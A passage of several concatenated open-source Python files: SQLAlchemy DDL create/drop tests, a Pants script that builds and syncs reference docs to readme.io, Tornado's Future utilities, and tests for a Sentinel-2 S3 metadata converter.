Column("id", Integer, primary_key=True),
Column("t1id", Integer, ForeignKey("t1.id")),
)
return m, t1, t2
def _fk_fixture_one(self):
m = MetaData()
t1 = Table(
"t1",
m,
Column("id", Integer, primary_key=True),
Column("t2id", Integer, ForeignKey("t2.id")),
)
t2 = Table("t2", m, Column("id", Integer, primary_key=True))
return m, t1, t2
def _table_index_fixture(self):
m = MetaData()
t1 = Table("t1", m, Column("x", Integer), Column("y", Integer))
i1 = Index("my_idx", t1.c.x, t1.c.y)
return m, t1, i1
def _table_seq_fixture(self):
m = MetaData()
s1 = Sequence("s1")
s2 = Sequence("s2")
t1 = Table("t1", m, Column("x", Integer, s1, primary_key=True))
t2 = Table("t2", m, Column("x", Integer, s2, primary_key=True))
return m, t1, t2, s1, s2
def _table_comment_fixture(self):
m = MetaData()
c1 = Column("id", Integer, comment="c1")
t1 = Table("t1", m, c1, comment="t1")
return m, t1, c1
def test_comment(self):
m, t1, c1 = self._table_comment_fixture()
generator = self._mock_create_fixture(
False, [t1], item_exists=lambda t: t not in ("t1",)
)
self._assert_create_comment([t1, t1, c1], generator, m)
def test_create_seq_checkfirst(self):
m, t1, t2, s1, s2 = self._table_seq_fixture()
generator = self._mock_create_fixture(
True, [t1, t2], item_exists=lambda t: t not in ("t1", "s1")
)
self._assert_create([t1, s1], generator, m)
def test_drop_seq_checkfirst(self):
m, t1, t2, s1, s2 = self._table_seq_fixture()
generator = self._mock_drop_fixture(
True, [t1, t2], item_exists=lambda t: t in ("t1", "s1")
)
self._assert_drop([t1, s1], generator, m)
def test_create_table_index_checkfirst(self):
"""create table that doesn't exist should not require a check
on the index"""
m, t1, i1 = self._table_index_fixture()
def exists(name):
if name == "my_idx":
raise NotImplementedError()
else:
return False
generator = self._mock_create_fixture(True, [t1], item_exists=exists)
self._assert_create([t1, i1], generator, t1)
def test_create_table_exists_index_checkfirst(self):
"""for the moment, if the table *does* exist, we are not checking
for the index. this can possibly be changed."""
m, t1, i1 = self._table_index_fixture()
def exists(name):
if name == "my_idx":
raise NotImplementedError()
else:
return True
generator = self._mock_create_fixture(True, [t1], item_exists=exists)
# nothing is created
self._assert_create([], generator, t1)
def test_drop_table_index_checkfirst(self):
m, t1, i1 = self._table_index_fixture()
def exists(name):
if name == "my_idx":
raise NotImplementedError()
else:
return True
generator = self._mock_drop_fixture(True, [t1], item_exists=exists)
self._assert_drop_tables([t1], generator, t1)
def test_create_index_checkfirst_exists(self):
m, t1, i1 = self._table_index_fixture()
generator = self._mock_create_fixture(
True, [i1], item_exists=lambda idx: True
)
self._assert_create_index([], generator, i1)
def test_create_index_checkfirst_doesnt_exist(self):
m, t1, i1 = self._table_index_fixture()
generator = self._mock_create_fixture(
True, [i1], item_exists=lambda idx: False
)
self._assert_create_index([i1], generator, i1)
def test_create_index_nocheck_exists(self):
m, t1, i1 = self._table_index_fixture()
generator = self._mock_create_fixture(
False, [i1], item_exists=lambda idx: True
)
self._assert_create_index([i1], generator, i1)
def test_create_index_nocheck_doesnt_exist(self):
m, t1, i1 = self._table_index_fixture()
generator = self._mock_create_fixture(
False, [i1], item_exists=lambda idx: False
)
self._assert_create_index([i1], generator, i1)
def test_drop_index_checkfirst_exists(self):
m, t1, i1 = self._table_index_fixture()
generator = self._mock_drop_fixture(
True, [i1], item_exists=lambda idx: True
)
self._assert_drop_index([i1], generator, i1)
def test_drop_index_checkfirst_doesnt_exist(self):
m, t1, i1 = self._table_index_fixture()
generator = self._mock_drop_fixture(
True, [i1], item_exists=lambda idx: False
)
self._assert_drop_index([], generator, i1)
def test_drop_index_nocheck_exists(self):
m, t1, i1 = self._table_index_fixture()
generator = self._mock_drop_fixture(
False, [i1], item_exists=lambda idx: True
)
self._assert_drop_index([i1], generator, i1)
def test_drop_index_nocheck_doesnt_exist(self):
m, t1, i1 = self._table_index_fixture()
generator = self._mock_drop_fixture(
False, [i1], item_exists=lambda idx: False
)
self._assert_drop_index([i1], generator, i1)
def test_create_collection_checkfirst(self):
m, t1, t2, t3, t4, t5 = self._table_fixture()
generator = self._mock_create_fixture(
True, [t2, t3, t4], item_exists=lambda t: t not in ("t2", "t4")
)
self._assert_create_tables([t2, t4], generator, m)
def test_drop_collection_checkfirst(self):
m, t1, t2, t3, t4, t5 = self._table_fixture()
generator = self._mock_drop_fixture(
True, [t2, t3, t4], item_exists=lambda t: t in ("t2", "t4")
)
self._assert_drop_tables([t2, t4], generator, m)
def test_create_collection_nocheck(self):
m, t1, t2, t3, t4, t5 = self._table_fixture()
generator = self._mock_create_fixture(
False, [t2, t3, t4], item_exists=lambda t: t not in ("t2", "t4")
)
self._assert_create_tables([t2, t3, t4], generator, m)
def test_create_empty_collection(self):
m, t1, t2, t3, t4, t5 = self._table_fixture()
generator = self._mock_create_fixture(
True, [], item_exists=lambda t: t not in ("t2", "t4")
)
self._assert_create_tables([], generator, m)
def test_drop_empty_collection(self):
m, t1, t2, t3, t4, t5 = self._table_fixture()
generator = self._mock_drop_fixture(
True, [], item_exists=lambda t: t in ("t2", "t4")
)
self._assert_drop_tables([], generator, m)
def test_drop_collection_nocheck(self):
m, t1, t2, t3, t4, t5 = self._table_fixture()
generator = self._mock_drop_fixture(
False, [t2, t3, t4], item_exists=lambda t: t in ("t2", "t4")
)
self._assert_drop_tables([t2, t3, t4], generator, m)
def test_create_metadata_checkfirst(self):
m, t1, t2, t3, t4, t5 = self._table_fixture()
generator = self._mock_create_fixture(
True, None, item_exists=lambda t: t not in ("t2", "t4")
)
self._assert_create_tables([t2, t4], generator, m)
def test_drop_metadata_checkfirst(self):
m, t1, t2, t3, t4, t5 = self._table_fixture()
generator = self._mock_drop_fixture(
True, None, item_exists=lambda t: t in ("t2", "t4")
)
self._assert_drop_tables([t2, t4], generator, m)
def test_create_metadata_nocheck(self):
m, t1, t2, t3, t4, t5 = self._table_fixture()
generator = self._mock_create_fixture(
False, None, item_exists=lambda t: t not in ("t2", "t4")
)
self._assert_create_tables([t1, t2, t3, t4, t5], generator, m)
def test_drop_metadata_nocheck(self):
m, t1, t2, t3, t4, t5 = self._table_fixture()
generator = self._mock_drop_fixture(
False, None, item_exists=lambda t: t in ("t2", "t4")
)
self._assert_drop_tables([t1, t2, t3, t4, t5], generator, m)
def test_create_metadata_auto_alter_fk(self):
m, t1, t2 = self._use_alter_fixture_one()
generator = self._mock_create_fixture(False, [t1, t2])
self._assert_create_w_alter(
[t1, t2]
+ list(t1.foreign_key_constraints)
+ list(t2.foreign_key_constraints),
generator,
m,
)
def test_create_metadata_inline_fk(self):
m, t1, t2 = self._fk_fixture_one()
generator = self._mock_create_fixture(False, [t1, t2])
self._assert_create_w_alter(
[t1, t2]
+ list(t1.foreign_key_constraints)
+ list(t2.foreign_key_constraints),
generator,
m,
)
def _assert_create_tables(self, elements, generator, argument):
self._assert_ddl(schema.CreateTable, elements, generator, argument)
def _assert_drop_tables(self, elements, generator, argument):
self._assert_ddl(schema.DropTable, elements, generator, argument)
def _assert_create(self, elements, generator, argument):
self._assert_ddl(
(schema.CreateTable, schema.CreateSequence, schema.CreateIndex),
elements,
generator,
argument,
)
def _assert_drop(self, elements, generator, argument):
self._assert_ddl(
(schema.DropTable, schema.DropSequence),
elements,
generator,
argument,
)
def _assert_create_w_alter(self, elements, generator, argument):
self._assert_ddl(
(schema.CreateTable, schema.CreateSequence, schema.AddConstraint),
elements,
generator,
argument,
)
def _assert_drop_w_alter(self, elements, generator, argument):
self._assert_ddl(
(schema.DropTable, schema.DropSequence, schema.DropConstraint),
elements,
generator,
argument,
)
def _assert_create_comment(self, elements, generator, argument):
self._assert_ddl(
(
schema.CreateTable,
schema.SetTableComment,
schema.SetColumnComment,
),
elements,
generator,
argument,
)
def _assert_create_index(self, elements, generator, argument):
self._assert_ddl((schema.CreateIndex,), elements, generator, argument)
def _assert_drop_index(self, elements, generator, argument):
self._assert_ddl((schema.DropIndex,), elements, generator, argument)
def _assert_ddl(self, ddl_cls, elements, generator, argument):
generator.traverse_single(argument)
for call_ in generator.connection.execute.mock_calls:
c = call_[1][0]
assert isinstance(c, ddl_cls)
assert c.element in elements, (
"element %r was not expected" % c.element
)
elements.remove(c.element)
if getattr(c, "include_foreign_key_constraints", None) is not None:
elements[:] = [
e
for e in elements
if e not in set(c.include_foreign_key_constraints)
]
assert not elements, "elements remain in list: %r" % elements
|
|
# Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
"""Generates and uploads the Pants reference documentation.
Dry run:
./pants run build-support/bin/generate_docs.py
Live run:
./pants run build-support/bin/generate_docs.py -- --sync --api-key=<API_KEY>
where API_KEY is your readme.io API Key, found here:
https://dash.readme.com/project/pants/v2.6/api-key
"""
from __future__ import annotations
import argparse
import html
import json
import logging
import os
import pkgutil
import re
import subprocess
from html.parser import HTMLParser
from pathlib import Path, PosixPath
from typing import Any, Dict, Iterable, Optional, cast
import pystache
import requests
from common import die
from readme_api import DocRef, ReadmeAPI
from pants.help.help_info_extracter import to_help_str
from pants.version import MAJOR_MINOR
logger = logging.getLogger(__name__)
def main() -> None:
logging.basicConfig(format="[%(levelname)s]: %(message)s", level=logging.INFO)
args = create_parser().parse_args()
if args.sync and not args.api_key:
raise Exception("You specified --sync so you must also specify --api-key")
version = determine_pants_version(args.no_prompt)
help_info = run_pants_help_all()
doc_urls = DocUrlMatcher().find_doc_urls(value_strs_iter(help_info))
logger.info("Found the following docsite URLs:")
for url in sorted(doc_urls):
logger.info(f" {url}")
logger.info("Fetching titles...")
slug_to_title = get_titles(doc_urls)
logger.info("Found the following titles:")
for slug, title in sorted(slug_to_title.items()):
logger.info(f" {slug}: {title}")
rewritten_help_info = rewrite_value_strs(help_info, slug_to_title)
generator = ReferenceGenerator(args, version, rewritten_help_info)
if args.sync:
generator.sync()
else:
generator.render()
def determine_pants_version(no_prompt: bool) -> str:
version = MAJOR_MINOR
if no_prompt:
logger.info(f"Generating docs for Pants {version}.")
return version
key_confirmation = input(
f"Generating docs for Pants {version}. Is this the correct version? [Y/n]: "
)
if key_confirmation and key_confirmation.lower() != "y":
die(
"Please either `git checkout` to the appropriate branch (e.g. 2.1.x), or change "
"src/python/pants/VERSION."
)
return version
# Code to replace doc urls with appropriate markdown, for rendering on the docsite.
_doc_url_pattern = r"https://www.pantsbuild.org/v(\d+\.[^/]+)/docs/(?P<slug>[a-zA-Z0-9_-]+)"
class DocUrlMatcher:
"""Utilities for regex matching docsite URLs."""
def __init__(self):
self._doc_url_re = re.compile(_doc_url_pattern)
def slug_for_url(self, url: str) -> str:
mo = self._doc_url_re.match(url)
if not mo:
raise ValueError(f"Not a docsite URL: {url}")
return cast(str, mo.group("slug"))
def find_doc_urls(self, strs: Iterable[str]) -> set[str]:
"""Find all the docsite urls in the given strings."""
return {mo.group(0) for s in strs for mo in self._doc_url_re.finditer(s)}
class DocUrlRewriter:
def __init__(self, slug_to_title: dict[str, str]):
self._doc_url_re = re.compile(_doc_url_pattern)
self._slug_to_title = slug_to_title
def _rewrite_url(self, mo: re.Match) -> str:
# The docsite injects the version automatically at markdown rendering time, so we
# must not also do so, or it will be doubled, and the resulting links will be broken.
slug = mo.group("slug")
title = self._slug_to_title.get(slug)
if not title:
raise ValueError(f"Found empty or no title for {mo.group(0)}")
return f"[{title}](doc:{slug})"
def rewrite(self, s: str) -> str:
return self._doc_url_re.sub(self._rewrite_url, s)
class TitleFinder(HTMLParser):
"""Grabs the page title out of a docsite page."""
def __init__(self):
super().__init__()
self._in_title: bool = False
self._title: str | None = None
def handle_starttag(self, tag, attrs):
if tag == "title":
self._in_title = True
def handle_endtag(self, tag):
if tag == "title":
self._in_title = False
def handle_data(self, data):
if self._in_title:
self._title = data.strip()
@property
def title(self) -> str | None:
return self._title
def get_title_from_page_content(page_content: str) -> str:
title_finder = TitleFinder()
title_finder.feed(page_content)
return title_finder.title or ""
def get_title(url: str) -> str:
return get_title_from_page_content(requests.get(url).text)
def get_titles(urls: set[str]) -> dict[str, str]:
"""Return map from slug->title for each given docsite URL."""
matcher = DocUrlMatcher()
# TODO: Parallelize the http requests.
# E.g., by turning generate_docs.py into a plugin goal and using the engine.
ret = {}
for url in urls:
ret[matcher.slug_for_url(url)] = get_title(url)
return ret
def create_parser() -> argparse.ArgumentParser:
parser = argparse.ArgumentParser(description="Generate the Pants reference markdown files.")
parser.add_argument(
"--no-prompt",
action="store_true",
default=False,
help="Don't prompt the user, accept defaults for all questions.",
)
parser.add_argument(
"--sync",
action="store_true",
default=False,
help="Whether to sync the generated reference docs to the docsite. "
"If unset, will generate markdown files to the path in --output "
"instead. If set, --api-key must be set.",
)
parser.add_argument(
"--output",
default=PosixPath(os.path.sep) / "tmp" / "pants_docs" / "help" / "option",
type=Path,
help="Path to a directory under which we generate the markdown files. "
"Useful for viewing the files locally when testing and debugging "
"the renderer.",
)
parser.add_argument("--api-key", help="The readme.io API key to use. Required for --sync.")
return parser
def run_pants_help_all() -> dict[str, Any]:
deactivated_backends = ["internal_plugins.releases", "pants.backend.experimental.java"]
activated_backends = [
"pants.backend.codegen.protobuf.python",
"pants.backend.awslambda.python",
"pants.backend.python.lint.bandit",
"pants.backend.python.lint.pylint",
"pants.backend.python.lint.yapf",
]
deactivated_plugins = ["toolchain.pants.plugin==0.14.0"]
argv = [
"./pants",
"--concurrent",
f"--plugins=-[{', '.join(map(repr, deactivated_plugins))}]",
f"--backend-packages=-[{', '.join(map(repr, deactivated_backends))}]",
f"--backend-packages=+[{', '.join(map(repr, activated_backends))}]",
"--no-verify-config",
"--remote-auth-plugin= ",
"help-all",
]
run = subprocess.run(argv, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8")
try:
run.check_returncode()
except subprocess.CalledProcessError:
logger.error(
f"Running {argv} failed with exit code {run.returncode}.\n\nstdout:\n{run.stdout}"
f"\n\nstderr:\n{run.stderr}"
)
raise
return cast(dict[str, Any], json.loads(run.stdout))
def value_strs_iter(help_info: dict[str, Any]) -> Iterable[str]:
def _recurse(val: Any) -> Iterable[str]:
if isinstance(val, str):
yield val
if isinstance(val, dict):
for v in val.values():
for x in _recurse(v):
yield x
if isinstance(val, list):
for v in val:
for x in _recurse(v):
yield x
for x in _recurse(help_info):
yield x
def rewrite_value_strs(help_info: dict[str, Any], slug_to_title: dict[str, str]) -> dict[str, Any]:
"""Return a copy of the argument with rewritten docsite URLs."""
rewriter = DocUrlRewriter(slug_to_title)
def _recurse(val: Any) -> Any:
if isinstance(val, str):
return rewriter.rewrite(val)
if isinstance(val, dict):
return {k: _recurse(v) for k, v in val.items()}
if isinstance(val, list):
return [_recurse(x) for x in val]
return val
return cast(dict[str, Any], _recurse(help_info))
class ReferenceGenerator:
def __init__(self, args: argparse.Namespace, version: str, help_info: dict[str, Any]) -> None:
self._args = args
self._readme_api = ReadmeAPI(api_key=self._args.api_key, version=version)
def get_tpl(name: str) -> str:
# Note that loading relative to __name__ may not always work when __name__=='__main__'.
buf = pkgutil.get_data("generate_docs", f"docs_templates/{name}")
if buf is None:
raise ValueError(f"No such template: {name}")
return buf.decode()
options_scope_tpl = get_tpl("options_scope_reference.md.mustache")
single_option_tpl = get_tpl("single_option_reference.md.mustache")
target_tpl = get_tpl("target_reference.md.mustache")
self._renderer = pystache.Renderer(
partials={
"scoped_options": options_scope_tpl,
"single_option": single_option_tpl,
"target": target_tpl,
}
)
self._category_id: Optional[str] = None # Fetched lazily.
# Load the data.
self._options_info = self.process_options_input(help_info, sync=self._args.sync)
self._targets_info = self.process_targets_input(help_info)
@staticmethod
def _link(scope: str, *, sync: bool) -> str:
# docsite pages link to the slug, local pages to the .md source.
url_safe_scope = scope.replace(".", "-")
return f"reference-{url_safe_scope}" if sync else f"{url_safe_scope}.md"
@classmethod
def process_options_input(cls, help_info: dict[str, Any], *, sync: bool) -> dict:
scope_to_help_info = help_info["scope_to_help_info"]
# Process the list of consumed_scopes into a comma-separated list, and add it to the option
# info for the goal's scope, to make it easy to render in the goal's options page.
for goal, goal_info in help_info["name_to_goal_info"].items():
assert isinstance(goal_info, dict)
consumed_scopes = sorted(goal_info["consumed_scopes"])
linked_consumed_scopes = [
f"[{cs}]({cls._link(cs, sync=sync)})"
for cs in consumed_scopes
if cs and cs != goal_info["name"]
]
comma_separated_consumed_scopes = ", ".join(linked_consumed_scopes)
scope_to_help_info[goal][
"comma_separated_consumed_scopes"
] = comma_separated_consumed_scopes
# Process the option data.
def munge_option(option_data):
# Munge the default so we can display it nicely when it's multiline, while
# still displaying it inline if it's not.
default_help_repr = option_data.get("default_help_repr")
if default_help_repr is None:
default_str = to_help_str(option_data["default"])
else:
# It should already be a string, but might as well be safe.
default_str = to_help_str(default_help_repr)
escaped_default_str = html.escape(default_str, quote=False)
if "\n" in default_str:
option_data["marked_up_default"] = f"<pre>{escaped_default_str}</pre>"
else:
option_data["marked_up_default"] = f"<code>{escaped_default_str}</code>"
for shi in scope_to_help_info.values():
for opt in shi["basic"]:
munge_option(opt)
for opt in shi["advanced"]:
munge_option(opt)
for opt in shi["deprecated"]:
munge_option(opt)
return help_info
@classmethod
def process_targets_input(cls, help_info: dict[str, Any]) -> dict[str, dict[str, Any]]:
target_info = help_info["name_to_target_type_info"]
for target in target_info.values():
for field in target["fields"]:
# Combine the `default` and `required` properties.
default_str = html.escape(str(field["default"]))
field["default_or_required"] = (
"required" if field["required"] else f"default: <code>{default_str}</code>"
)
field["description"] = str(field["description"])
target["fields"] = sorted(target["fields"], key=lambda fld: cast(str, fld["alias"]))
target["description"] = str(target["description"])
return cast(Dict[str, Dict[str, Any]], target_info)
@property
def category_id(self) -> str:
"""The id of the "Reference" category on the docsite."""
if self._category_id is None:
self._category_id = self._readme_api.get_category("reference").id
return self._category_id
def _create(
self, parent_doc_id: Optional[str], slug_suffix: str, title: str, body: str
) -> None:
"""Create a new docsite reference page.
Operates by creating a placeholder page, and then populating it via _update().
This works around a quirk of the readme.io API: You cannot set the page slug when you
create a page. Instead it is derived from the title.
In fact there is no way to set or modify the slug via the API at all, which makes sense
since the API references the page via the slug. When you change the slug in the UI
it is likely deleting and recreating the page under the covers.
This is a problem if you want the slug to be different than the human-readable title,
as we do in this case. Specifically, we want the human-readable page title to be just
the scope name, e.g., `test` (so it appears that way in the sidebar). But we want the
slug to be `reference-test`, so that it doesn't collide with any other, non-generated page
that happens to occupy the slug `test`.
To solve this we create the placeholder page with a title from which to derive the slug,
and when we update the page to set its content, we update the title to be the
one we want humans to see (this will not change the slug, see above).
"""
slug = f"reference-{slug_suffix}"
self._readme_api.create_doc(
title=slug, category=self.category_id, parentDoc=parent_doc_id, hidden=False
)
# Placeholder page exists, now update it with the real title and body.
self._readme_api.update_doc(slug=slug, title=title, category=self.category_id, body=body)
def _render_target(self, alias: str) -> str:
return cast(str, self._renderer.render("{{> target}}", self._targets_info[alias]))
def _render_options_body(self, scope_help_info: Dict) -> str:
"""Renders the body of a single options help page."""
return cast(str, self._renderer.render("{{> scoped_options}}", scope_help_info))
@classmethod
def _render_parent_page_body(cls, items: Iterable[str], *, sync: bool) -> str:
"""Returns the body of a parent page for the given items."""
# The page just lists the items, with links to the page for each one.
lines = [f"- [{item}]({cls._link(item, sync=sync)})" for item in items]
return "\n".join(lines)
def render(self) -> None:
"""Renders the pages to local disk.
Useful for debugging and iterating on the markdown.
"""
output_dir = Path(self._args.output)
output_dir.mkdir(parents=True, exist_ok=True)
goals = [
scope
for scope, shi in self._options_info["scope_to_help_info"].items()
if shi["is_goal"]
]
subsystems = [
scope
for scope, shi in self._options_info["scope_to_help_info"].items()
if scope and not shi["is_goal"]
]
def write(filename: str, content: str) -> None:
path = output_dir / filename
path.write_text(content)
logger.info(f"Wrote {path}")
write("goals-index.md", self._render_parent_page_body(sorted(goals), sync=False))
write("subsystems-index.md", self._render_parent_page_body(sorted(subsystems), sync=False))
for shi in self._options_info["scope_to_help_info"].values():
write(f"{shi['scope'] or 'GLOBAL'}.md", self._render_options_body(shi))
write(
"targets-index.md",
self._render_parent_page_body(sorted(self._targets_info.keys()), sync=False),
)
for alias in self._targets_info.keys():
write(f"{alias}.md", self._render_target(alias))
def sync(self) -> None:
"""Render the pages and sync them to the live docsite.
All pages live under the "reference" category.
There are four top-level pages under that category:
- Global options
- The Goals parent page
- The Subsystems parent page
- The Targets parent page
The individual reference pages are nested under these parent pages.
"""
# Docs appear on the site in creation order. If we only create new docs
# that don't already exist then they will appear at the end, instead of in
# alphabetical order. So we first delete all previous docs, then recreate them.
#
# TODO: Instead of deleting and recreating, we can set the order explicitly.
#
# Note that deleting a non-empty parent will fail, so we delete children first.
def do_delete(docref: DocRef):
for child in docref.children:
do_delete(child)
self._readme_api.delete_doc(docref.slug)
docrefs = self._readme_api.get_docs_for_category("reference")
for docref in docrefs:
do_delete(docref)
# Partition the scopes into goals and subsystems.
goals = {}
subsystems = {}
for scope, shi in self._options_info["scope_to_help_info"].items():
if scope == "":
continue # We handle the global scope separately.
if shi["is_goal"]:
goals[scope] = shi
else:
subsystems[scope] = shi
# Create the top-level docs in order.
self._create(
parent_doc_id=None,
slug_suffix="global",
title="Global options",
body=self._render_options_body(self._options_info["scope_to_help_info"][""]),
)
self._create(
parent_doc_id=None,
slug_suffix="all-goals",
title="Goals",
body=self._render_parent_page_body(sorted(goals.keys()), sync=True),
)
self._create(
parent_doc_id=None,
slug_suffix="all-subsystems",
title="Subsystems",
body=self._render_parent_page_body(sorted(subsystems.keys()), sync=True),
)
self._create(
parent_doc_id=None,
slug_suffix="all-targets",
title="Targets",
body=self._render_parent_page_body(sorted(self._targets_info.keys()), sync=True),
)
# Create the individual goal/subsystem/target docs.
all_goals_doc_id = self._readme_api.get_doc("reference-all-goals").id
for scope, shi in sorted(goals.items()):
self._create(
parent_doc_id=all_goals_doc_id,
slug_suffix=scope,
title=scope,
body=self._render_options_body(shi),
)
all_subsystems_doc_id = self._readme_api.get_doc("reference-all-subsystems").id
for scope, shi in sorted(subsystems.items()):
self._create(
parent_doc_id=all_subsystems_doc_id,
slug_suffix=scope.replace(".", "-"),
title=scope,
body=self._render_options_body(shi),
)
all_targets_doc_id = self._readme_api.get_doc("reference-all-targets").id
for alias, data in sorted(self._targets_info.items()):
self._create(
parent_doc_id=all_targets_doc_id,
slug_suffix=alias,
title=alias,
body=self._render_target(alias),
)
if __name__ == "__main__":
main()
|
|
#!/usr/bin/env python
#
# Copyright 2012 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Utilities for working with threads and ``Futures``.
``Futures`` are a pattern for concurrent programming introduced in
Python 3.2 in the `concurrent.futures` package (this package has also
been backported to older versions of Python and can be installed with
``pip install futures``). Tornado will use `concurrent.futures.Future` if
it is available; otherwise it will use a compatible class defined in this
module.
"""
from __future__ import absolute_import, division, print_function, with_statement
import functools
import sys
from tornado.stack_context import ExceptionStackContext, wrap
from tornado.util import raise_exc_info, ArgReplacer
try:
from concurrent import futures
except ImportError:
futures = None
class ReturnValueIgnoredError(Exception):
pass
class _DummyFuture(object):
def __init__(self):
self._done = False
self._result = None
self._exception = None
self._callbacks = []
def cancel(self):
return False
def cancelled(self):
return False
def running(self):
return not self._done
def done(self):
return self._done
def result(self, timeout=None):
self._check_done()
if self._exception:
raise self._exception
return self._result
def exception(self, timeout=None):
self._check_done()
if self._exception:
return self._exception
else:
return None
def add_done_callback(self, fn):
if self._done:
fn(self)
else:
self._callbacks.append(fn)
def set_result(self, result):
self._result = result
self._set_done()
def set_exception(self, exception):
self._exception = exception
self._set_done()
def _check_done(self):
if not self._done:
raise Exception("DummyFuture does not support blocking for results")
def _set_done(self):
self._done = True
for cb in self._callbacks:
# TODO: error handling
cb(self)
self._callbacks = None
if futures is None:
Future = _DummyFuture
else:
Future = futures.Future
class TracebackFuture(Future):
"""Subclass of `Future` which can store a traceback with
exceptions.
The traceback is automatically available in Python 3, but in the
Python 2 futures backport this information is discarded.
"""
def __init__(self):
super(TracebackFuture, self).__init__()
self.__exc_info = None
def exc_info(self):
return self.__exc_info
def set_exc_info(self, exc_info):
"""Traceback-aware replacement for
`~concurrent.futures.Future.set_exception`.
"""
self.__exc_info = exc_info
self.set_exception(exc_info[1])
def result(self):
if self.__exc_info is not None:
raise_exc_info(self.__exc_info)
else:
return super(TracebackFuture, self).result()
class DummyExecutor(object):
def submit(self, fn, *args, **kwargs):
future = TracebackFuture()
try:
future.set_result(fn(*args, **kwargs))
except Exception:
future.set_exc_info(sys.exc_info())
return future
dummy_executor = DummyExecutor()
def run_on_executor(fn):
"""Decorator to run a synchronous method asynchronously on an executor.
The decorated method may be called with a ``callback`` keyword
argument and returns a future.
"""
@functools.wraps(fn)
def wrapper(self, *args, **kwargs):
callback = kwargs.pop("callback", None)
future = self.executor.submit(fn, self, *args, **kwargs)
if callback:
self.io_loop.add_future(future,
lambda future: callback(future.result()))
return future
return wrapper
_NO_RESULT = object()
def return_future(f):
"""Decorator to make a function that returns via callback return a
`Future`.
The wrapped function should take a ``callback`` keyword argument
and invoke it with one argument when it has finished. To signal failure,
the function can simply raise an exception (which will be
captured by the `.StackContext` and passed along to the ``Future``).
From the caller's perspective, the callback argument is optional.
If one is given, it will be invoked when the function is complete
with `Future.result()` as an argument. If the function fails, the
callback will not be run and an exception will be raised into the
surrounding `.StackContext`.
If no callback is given, the caller should use the ``Future`` to
wait for the function to complete (perhaps by yielding it in a
`.gen.engine` function, or passing it to `.IOLoop.add_future`).
Usage::
@return_future
def future_func(arg1, arg2, callback):
# Do stuff (possibly asynchronous)
callback(result)
@gen.engine
def caller(callback):
yield future_func(arg1, arg2)
callback()
Note that ``@return_future`` and ``@gen.engine`` can be applied to the
same function, provided ``@return_future`` appears first. However,
consider using ``@gen.coroutine`` instead of this combination.
"""
replacer = ArgReplacer(f, 'callback')
@functools.wraps(f)
def wrapper(*args, **kwargs):
future = TracebackFuture()
callback, args, kwargs = replacer.replace(
lambda value=_NO_RESULT: future.set_result(value),
args, kwargs)
def handle_error(typ, value, tb):
future.set_exc_info((typ, value, tb))
return True
exc_info = None
with ExceptionStackContext(handle_error):
try:
result = f(*args, **kwargs)
if result is not None:
raise ReturnValueIgnoredError(
"@return_future should not be used with functions "
"that return values")
except:
exc_info = sys.exc_info()
raise
if exc_info is not None:
# If the initial synchronous part of f() raised an exception,
# go ahead and raise it to the caller directly without waiting
# for them to inspect the Future.
raise_exc_info(exc_info)
# If the caller passed in a callback, schedule it to be called
# when the future resolves. It is important that this happens
# just before we return the future, or else we risk confusing
# stack contexts with multiple exceptions (one here with the
# immediate exception, and again when the future resolves and
# the callback triggers its exception by calling future.result()).
if callback is not None:
def run_callback(future):
result = future.result()
if result is _NO_RESULT:
callback()
else:
callback(future.result())
future.add_done_callback(wrap(run_callback))
return future
return wrapper
def chain_future(a, b):
"""Chain two futures together so that when one completes, so does the other.
The result (success or failure) of ``a`` will be copied to ``b``.
"""
def copy(future):
assert future is a
if (isinstance(a, TracebackFuture) and isinstance(b, TracebackFuture)
and a.exc_info() is not None):
b.set_exc_info(a.exc_info())
elif a.exception() is not None:
b.set_exception(a.exception())
else:
b.set_result(a.result())
a.add_done_callback(copy)
|
|
import json
import unittest
from copy import copy
from collections import OrderedDict
from six import iterkeys
from sentinel_s3.converter import (camelcase_underscore, metadata_to_dict, tile_metadata, to_latlon,
get_tile_geometry, convert_coordinates)
class Test(unittest.TestCase):
def test_camelcase_underscore(self):
assert camelcase_underscore('productName') == 'product_name'
assert camelcase_underscore('ProductName') == 'product_name'
assert camelcase_underscore('productname') == 'productname'
assert camelcase_underscore('product1Name') == 'product1_name'
def test_metadata_to_dict(self):
xml = open('tests/samples/metadata.xml')
product = metadata_to_dict(xml)
assert isinstance(product, OrderedDict)
assert 'band_list' in product
assert 'tiles' in product
assert product['spacecraft_name'] == 'Sentinel-2A'
assert len(product['band_list']) == 13
tiles = list(iterkeys(product['tiles']))
assert len(tiles) == 20
def test_metadata_to_dict_new_format(self):
xml = open('tests/samples/metadata_new.xml')
product = metadata_to_dict(xml)
assert isinstance(product, OrderedDict)
assert 'band_list' in product
assert 'tiles' in product
assert product['spacecraft_name'] == 'Sentinel-2A'
assert len(product['band_list']) == 13
tiles = list(iterkeys(product['tiles']))
assert len(tiles) == 1
def test_tile_metadata(self):
f = open('tests/samples/tileInfo.json', 'rb')
tile_info = json.loads(f.read().decode(), object_pairs_hook=OrderedDict)
tile = tile_metadata(tile_info, metadata_to_dict('tests/samples/metadata.xml'))
assert isinstance(tile, OrderedDict)
assert tile['thumbnail'] == 'http://sentinel-s2-l1c.s3.amazonaws.com/tiles/56/X/NF/2016/3/16/0/preview.jp2'
assert tile['tile_name'] == 'S2A_OPER_MSI_L1C_TL_SGS__20160316T054120_A003818_T56XNF_N02.01'
assert tile['utm_zone'] == 56
assert tile['data_coverage_percentage'] == 65.58
assert tile['sensing_orbit_direction'] == 'DESCENDING'
assert len(tile['download_links']['aws_s3']) == 13
# Make sure bands urls are left padded
d_link = tile['download_links']['aws_s3'][0].split('.')[-2].split('/')
assert d_link[-1] == 'B01'
def test_tile_metadata_with_geometry_check(self):
def geometry_check(meta):
if meta['latitude_band'] == 'N':
return False
return True
f = open('tests/samples/tileInfo.json', 'rb')
tile_info = json.loads(f.read().decode(), object_pairs_hook=OrderedDict)
tile = tile_metadata(tile_info, metadata_to_dict('tests/samples/metadata.xml'), geometry_check)
assert isinstance(tile, OrderedDict)
